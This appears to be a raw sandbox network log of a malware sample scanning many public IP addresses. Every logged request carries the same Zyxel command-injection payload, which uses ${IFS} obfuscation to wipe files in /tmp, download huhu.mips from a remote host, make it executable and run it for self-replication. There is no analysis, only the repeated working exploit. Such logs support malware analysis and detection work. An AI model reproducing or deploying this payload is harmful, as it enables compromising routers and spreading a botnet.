                                                Jan 29, 2024 07:07:48.353686094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4486192.168.2.2335414180.210.192.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353705883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4487192.168.2.2333834164.103.39.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353738070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4488192.168.2.233425868.11.97.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353830099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4489192.168.2.2354750182.113.34.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353830099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4490192.168.2.233772614.16.206.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353899956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4491192.168.2.2343168205.225.79.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353924990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4492192.168.2.2357716205.170.123.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.353943110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4493192.168.2.2351202116.208.179.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354023933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4494192.168.2.2338310149.195.219.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354053974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4495192.168.2.235936827.231.111.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354062080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4496192.168.2.2353578178.192.158.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354099035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4497192.168.2.2333272213.173.100.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354136944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4498192.168.2.2336502200.242.240.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354152918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4499192.168.2.2334164200.240.33.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.354190111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4500192.168.2.2352062170.139.6.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361140013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4501192.168.2.2338530192.57.83.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361407042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4502192.168.2.2349576169.245.83.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361445904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4503192.168.2.2338836209.232.240.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361483097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4504192.168.2.234305452.169.119.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361536980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4505192.168.2.2335436115.104.54.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361569881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4506192.168.2.2356856141.118.224.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361632109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4507192.168.2.235275417.27.189.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361675024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4508192.168.2.2357888221.177.137.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361710072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4509192.168.2.2344224223.74.113.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361748934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4510192.168.2.233545297.143.242.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361799002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4511192.168.2.2340762131.75.15.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361835957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4512192.168.2.233563447.192.160.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361860991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4513192.168.2.2343346159.177.21.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361916065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4514192.168.2.2353700141.125.207.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361946106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4515192.168.2.2358622213.254.175.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.361985922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4516192.168.2.2342434195.147.70.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362025976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4517192.168.2.234865280.119.128.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362057924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4518192.168.2.234098681.126.40.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362104893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4519192.168.2.2351886220.56.169.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362144947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4520192.168.2.2359824101.230.106.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362174988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4521192.168.2.2335340208.93.201.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362211943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4522192.168.2.235943454.8.241.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362260103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4523192.168.2.2351914162.219.242.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362291098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4524192.168.2.233827676.13.19.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362354040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4525192.168.2.2344012186.16.240.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362354994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4526192.168.2.234871077.200.186.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362406015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4527192.168.2.2359350113.235.8.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362442017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4528192.168.2.2359374223.100.171.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362462044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4529192.168.2.235627850.17.254.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362510920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4530192.168.2.2357846133.24.158.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362569094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4531192.168.2.2343392173.85.19.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362591982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4532192.168.2.235814649.250.183.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362648010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4533192.168.2.2359108133.228.165.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362670898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4534192.168.2.235566650.130.53.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362704039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4535192.168.2.2350028129.198.57.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362746954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4536192.168.2.2356756212.175.1.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362792015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4537192.168.2.2350770200.168.193.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362848043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4538192.168.2.2343132148.107.2.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362879038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4539192.168.2.2344136120.80.123.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362910986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4540192.168.2.2345176180.11.135.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362935066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4541192.168.2.2350108124.33.67.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.362993956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4542192.168.2.235805220.147.182.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363038063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4543192.168.2.234074444.201.192.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363069057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4544192.168.2.233680683.132.12.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363104105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4545192.168.2.2354414106.71.156.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363161087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4546192.168.2.234224288.235.148.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363208055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4547192.168.2.233604839.47.100.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363243103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4548192.168.2.2347440162.107.127.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363281965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4549192.168.2.2360336142.206.173.146443
                                                TimestampBytes transferredDirectionData
